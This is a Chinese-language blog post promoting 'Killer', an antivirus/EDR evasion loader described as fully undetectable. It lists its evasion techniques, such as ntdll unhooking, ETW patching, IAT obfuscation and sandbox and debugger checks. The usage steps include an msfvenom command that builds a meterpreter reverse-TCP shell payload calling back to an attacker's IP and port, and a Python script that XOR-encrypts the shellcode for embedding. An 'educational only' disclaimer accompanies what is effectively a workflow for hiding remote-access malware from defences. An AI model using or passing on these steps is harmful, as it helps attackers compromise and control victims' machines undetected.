Eswlnk Blog Eswlnk Blog
  • 资源
    • 精彩视频
    • 破解专区
      • WHMCS
      • WordPress主题
      • WordPress插件
    • 其他分享
    • 极惠VPS
    • PDF资源
  • 关于我
    • 论文阅读
    • 关于本站
    • 通知
    • 左邻右舍
    • 玩物志趣
    • 日志
    • 专题
  • 热议话题
    • 游戏资讯
  • 红黑
    • 渗透分析
    • 攻防对抗
    • 代码发布
  • 自主研发
    • 知识库
    • 插件
      • ToolBox
      • HotSpot AI 热点创作
    • 区块
    • 快乐屋
    • 卡密
  • 乱步
    • 文章榜单
    • 热门标签
  • 问答中心反馈
  • 注册
  • 登录
首页 › 代码发布 › Killer | 一款专为逃避AV、EDR或安全工具所开发的工具

Killer | 一款专为逃避AV、EDR或安全工具所开发的工具

Eswlnk的头像
Eswlnk
2023-06-15 20:43:45
Killer | 一款专为逃避AV、EDR或安全工具所开发的工具-Eswlnk Blog
智能摘要 AI
本文介绍了一款用于绕过学习用途安全工具的AV/EDR逃避工具,当前处于隐蔽未知功能(FUD)状态。该工具具备多种逃避技术,如内存扫描逃避、DLL取消挂接、IAT隐藏与混淆、ETW补丁绕过、沙盒逃避及防调试等。用户可通过`msfvenom`生成shellcode并使用XOR加密,最终将其嵌入工具中。文档提供了详细步骤和相关链接供进一步学习。强调该工具仅供教育用途,并建议使用Visual Studio进行编译。

这是一款AV/EDR逃避工具,可以用于绕过学习用的安全工具,目前该工具处于FUD状态。

Killer | 一款专为逃避AV、EDR或安全工具所开发的工具-Eswlnk Blog

工具特点:

  • 模块破坏用于内存扫描逃避。
  • 通过新的ntdll副本取消DLL取消挂接。
  • 隐藏IAT和混淆以及API取消挂接。
  • 通过ETW Patching绕过某些安全控制。
  • 包括沙盒逃避技术和基本的防调试。
  • 通过XOR进行完全混淆(函数-密钥-Shellcode)。
  • Shellcode被反转和加密。
  • 将有效载荷移动到无法使用API的空白内存中。
  • GetProcAddress和GetModuleHandle实现@ cocomelonc。
  • 运行时不会创建新线程,并支持x64和x86架构。

如何使用:

使用msfvenom工具生成你的shellcode:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST<IP> LPORT<PORT> -f py

然后将输出复制到加密器的XOR函数中:

data = ...
key  = 0x50 
print('{ ', end='')
for i in data:
    print(hex(i ^ key), end=', ')
print("0x0 };") 

最后,您可以处理解密函数,对于脚本小子来说并不容易,您可以在我的文章中了解更多信息:

  • Part 1 => https://medium.com/@0xHossam/av-edr-evasion-malware-development-933e50f47af5
  • Part 2 => https://medium.com/@0xHossam/av-edr-evasion-malware-development-p2-7a947f7db354

以下是运行后的结果:

Killer | 一款专为逃避AV、EDR或安全工具所开发的工具-Eswlnk Blog

重要提示:

  • 首先感谢Abdallah Mohammed为我提供帮助^_^。
  • 该工具仅用于教育目的。
  • 使用Visual Studio编译代码。
本站默认网盘访问密码:1166
本站默认网盘访问密码:1166
声明:本站原创文章文字版权归本站所有,转载务必注明作者和出处;本站转载文章仅仅代表原作者观点,不代表本站立场,图文版权归原作者所有。如有侵权,请联系我们删除。
Windows安全软件
0
0
Eswlnk的头像
Eswlnk
一个有点倒霉的研究牲站长
赞赏
Python如何输出九九乘法表?
上一篇
艺术签名设计 | 字节跳动小程序抖音艺术签名小程序源码
下一篇

评论 (0)

请登录以参与评论
现在登录
    发表评论

猜你喜欢

  • 「漏洞资讯」CVE-2025-12914:宝塔面板曝出注入漏洞
  • 「亲测有效」Google Gemini 学生优惠:解决身份验证和支付卡验证
  • 今日热点:伪Clash软件下载陷阱曝光,附防范建议
  • 漏洞资讯:Ollama 未授权访问漏洞分析与防护指南
  • 「攻防对抗」利用 fastjson 原生反序列化与动态代理突破安全限制
Eswlnk的头像

Eswlnk

一个有点倒霉的研究牲站长
1108
文章
319
评论
679
获赞

随便看看

「工具分享」验证码识别 3.0 | 支持Chrome浏览器插件调用
2022-11-06 22:40:52
MAAD-AF | 快速有效的M365和Azure AD安全测试攻击工具
2023-06-06 0:57:30
「攻防对抗」TGP Daemon 守护进程致盲360核晶
2024-10-26 19:53:11

文章目录

专题展示

WordPress53

工程实践37

热门标签

360 AI API CDN java linux Nginx PDF PHP python SEO Windows WordPress 云服务器 云服务器知识 代码 免费 安全 安卓 工具 开发日志 微信 微软 手机 插件 攻防 攻防对抗 教程 日志 渗透分析 源码 漏洞 电脑 破解 系统 编程 网站优化 网络 网络安全 脚本 苹果 谷歌 软件 运维 逆向
  • 首页
  • 知识库
  • 地图
Copyright © 2023-2025 Eswlnk Blog. Designed by XiaoWu.
本站CDN由 壹盾安全 提供高防CDN安全防护服务
蜀ICP备20002650号-10
页面生成用时 1.109 秒   |  SQL查询 23 次
本站勉强运行:
友情链接: Eswlnk Blog 网站渗透 倦意博客 特资啦!个人资源分享站 祭夜博客 iBAAO壹宝头条
  • WordPress142
  • 网络安全64
  • 漏洞52
  • 软件52
  • 安全48
现在登录
  • 资源
    • 精彩视频
    • 破解专区
      • WHMCS
      • WordPress主题
      • WordPress插件
    • 其他分享
    • 极惠VPS
    • PDF资源
  • 关于我
    • 论文阅读
    • 关于本站
    • 通知
    • 左邻右舍
    • 玩物志趣
    • 日志
    • 专题
  • 热议话题
    • 游戏资讯
  • 红黑
    • 渗透分析
    • 攻防对抗
    • 代码发布
  • 自主研发
    • 知识库
    • 插件
      • ToolBox
      • HotSpot AI 热点创作
    • 区块
    • 快乐屋
    • 卡密
  • 乱步
    • 文章榜单
    • 热门标签
  • 问答中心反馈